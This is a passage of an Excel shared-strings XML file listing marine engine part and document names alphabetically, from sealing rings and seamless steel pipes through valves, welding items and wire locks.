    <t>SEALING AIR PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEALING RING FOR PISTON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEALING RING W. BACK-UP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEALING RING W.BACK-UP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEALING RINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEAML.STEEL PIPE W.CERT.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEAML.STEEL PIPES W.CERT.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEAMLESS P.STEEL PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEAMLESS PREC.ST,PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEAMLESS PREC.STEEL PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEAMLESS PREC.STEEL PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEAMLESS STEEL PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEAMLESS STEEL PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEAT VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEATING FOR TURBOCHARGER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEAWATER COOLING SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SECTIONAL IRON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SECTIONAL IRON AND STEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SECURING OF SUPPORTING CHOCKS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SECURING SUPPORTINGCHOCKS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEGMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEGMENT HOLDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEGMENT SEALING RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SELECTION TABLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SELF-TAPPING SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEMI-CONDUCTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SERRATED LOCK WASHERS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHAFT EARTHING DEVICE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHAFT F.CHAIN WHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHAFT F.TIGHTENING BOLT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHAFT FOR CHAIN WHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHAFT LINE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHAFT PIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHAFT PIN FOR REVERSING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHAFT-LUBRICATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHAFT-PIN FOR REVERSING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHAFT-PIN FOR ROLLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHELL*</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHOP TRIAL,DELIVERY TEST</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHOP TRIALS,DELIVERY TEST</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SIDE CHOCK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SIDE CHOCKS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLEEVE FOR RAILINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLEEVE-CYL. WITH COLLAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLEEVE-OIL-LESS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLEEVE-OUTSIDE EDGED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLIT PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLUGGING SPANNERS.OPEN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLUGGING SPANNERS.RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SOCKET SPANNERS.SQ.DRIVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SOCKET WRENCH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SOCKET WRENCH-OUT.HEX.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SOCKET WRENCH-OUTS.HEX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SOCKRT WRENCH-OUTS.HEX.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SOCKERS WITH SRG THREAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPADE JACK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPARE PARTS LIST</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPEC.TEST PRESSURE PUM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPEC.TEST PRESSURE PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPECIAL LOCKINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPHERICAL NUT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPHERICAL WASHER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPHERICAL WASHERS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPINDEL*</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPINDLE*</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPLIT PINS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPRAY NOZZLES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPRAY PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPRING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPRING LOADED ARM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPRING PIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPRING PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPRING-LOADED LEVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPRING-LOADED PULL-ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SQUARE FLANGES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SQUARE NUT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SQUARE STEEL BARS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ST.AIR DISTRIB-MOUNTING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STANCHIONS W.STUD.COMPL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STAND(DISMOUNT CAMSHAFT)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STANDARD INSTRUMENTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STARING AIR DISTRIBUTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STARTER BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STARTING AIR DISTRIBUTE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STARTING AIR PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STARTING AIR PIPES,COMPL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STARTING VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STARTING VALVE HOUSING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STAY BOLT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STAY BOLT-COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STEEL BALL.SOLID</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STEEL PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STEEL PEPE-STRAIGHT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STEEL PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STEP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STOP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STOP RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STOP RINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STOP SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STRAIGHT BULKHEAD COUPL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STRAIGHT COCK,MALE/FEMALE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STRAIGHT FEMALE COUPLINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STRAIGHT MALE STUD COUPL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STRAIGHT VALVE,FE-/FEMALE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STRAIGHT VALVE,MALE/MALE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STRAIGHTWAY VALVES,COMPL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUD SETTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUD*</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUD.LIFT OF THRUST SHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUD-CYL.COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STU-CYLINDER COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUD-FUEL VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUD-STARTING VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUDS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUDS WITH ISO-M THREAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUDS-STARTING VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUFFING BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUFFING BOX DRAIN CLEAN.SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUFFING BOX DRAIN PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUFFING BOX-HALF</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUB.-ASSEMBLING REG.57</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUCTION BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUCTION PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUCTION PIPE COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUCTION VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUNDRY CHAINS AND LINKS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUNDRY PIPES-AFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPP.SIGNAL EQUIPMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPLEM.SIGNAL EQUIPMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT F.LIFTING TOOL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT FOR EXH.RECEIVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT FOR INSTRUMENTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT FOR POCKET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT LUG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT MADE OF PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT OF SECTIONAL IRON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT SECTIONAL IRON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORTING CHOCK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORTING CHOCKS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SURFACE TREATMENT OF ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SW COOLING PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SW COOLING PIPES,1 TC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SW COOLING SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SWITCH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SWITCH 110-… VOLTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SWITCH 111-…VOLTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TAB WASHER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TACHO SAFETY EQUIPMNET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TACHOMETER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TANK CYLINDRICAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TAP.DOWELS VAR.TAPER LGTH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TAPER PINS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TC CLEAN.PIPE (SOFT BLAST)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TC CLEAN.PIPE(SOFT BLAST)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TECH DATA-TURBOCHARGER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEE PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">TELESCOPE PIPE </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEMPLATE-EXH.CAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEMPLATE-EXHAUST CAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEMPLATE-FUEL CAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEMPLATE-PISTON TOP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TERMINALBAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEST EQUIPMENT.EXH.VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEST EQUIPMENT-ACTUATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEST MANDREL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEST RIG-FUEL OIL VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEST RIG-FUEL VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THERMOMETER POCKET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THERMOMETER POCKETS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THERMOMETERS POCKETS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THREAD INSERT-METRIC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THREAD INSERT-P. THREAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THREAD INSERT-P THREAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THREE MAY COCK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THROTTLE VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">THRUST BEARING </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THRUST BEARING CONTROL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THRUST DISC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THRUST FLANGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THRUST SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THUMB NUT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THUMB SCREWS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TIGHTENING BOLT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TIGHTING BOLT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TIGHTING INSTRUCTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TIGHTN.TEMPL.,ACTUATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TIGHTN.TEMPL.,FUEL PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOL F.TURN.OUT SEGMENTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOL SETS,COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOL,EMERG.OPEN EXH.VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOLS FOR COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOLS FOR MS-924 EPOXY CHOCKS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOLS FOR MS-925</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOTH SECTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOTHED BAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOP BRACING ARRANGMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOP BRACING INSTRUCTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOP BRACING OF ENGINE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOP GOVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOP FLANGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOP FLANGE-COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOP PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TREATMENT OF FW SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TUBE PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TUBE PLATE FOR REVERSING CHAMBER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TUBE ROUNDING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TUBE-EXPANDER COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TUNING AND TURNING WHEELS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TUNING WHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TURBOCHARGER SYSTEM.TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TURNBUCKLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TURNING GEAR COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>UNATTENDED MACH.SPACES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>UNATTENDED MACH.SPACES.GLASS REQUIREMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>UNION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>UNION ELBOW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>UNION NIPPLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>UNION NUT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>UNION NUT AND PLUG SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>UNION NUTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>UNION SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>UNION W.TAPER SEAT.FEMALE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>UNIONS FOR PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>UNIONS W.TAPER SEAT.M/F</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>UNIT FOR LAMP TEST</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VALVE FLAP*</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VALVE HEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VALVE HOUSE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VALVE MOUNTING PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VALVE OPENING DIAGRAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VALVE SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VALVE SEAT+SPINDLE GRINDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VALVE SPINDLE GUIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VANE WHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VARIOUS PIPE-TURBOCHARG.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VARIOUS PIPRS REAR-SIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VARIOUS PIPES-EXH.SIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VARIOUS PIPES-FRAME BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VARIOUS PIPES-TURBOCHARG.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VARIOUS, PIPES-EXH.SIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VENTILSPINDEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VESSEL-CYLINDRICAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WASH'S F.IMPACT HANDWHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WASHER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WASHERS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WATER AND OIL IN ENGINE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WATER MIST CATCHER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WATERPROOF LAMP COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WATERPROOF LAMP TEST</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WEARING RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WEIGHTS AND CENTRE OF VRAVITY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELD INSTRUCT.PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELD INSTRUCTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELD-ON FLANGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELD-ON FLANGES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELDED STEEL PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELDING COUPLINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELDING INSTRUCTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELDING MATERIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELDING NECK FLANGES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELDING PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELDING SPECIFICATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELDING-ON STUDS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WHITE METAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WING NUTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WIRE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WIRE GAUZE-STAINLESS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WIRE GUIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WIRE LOCK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
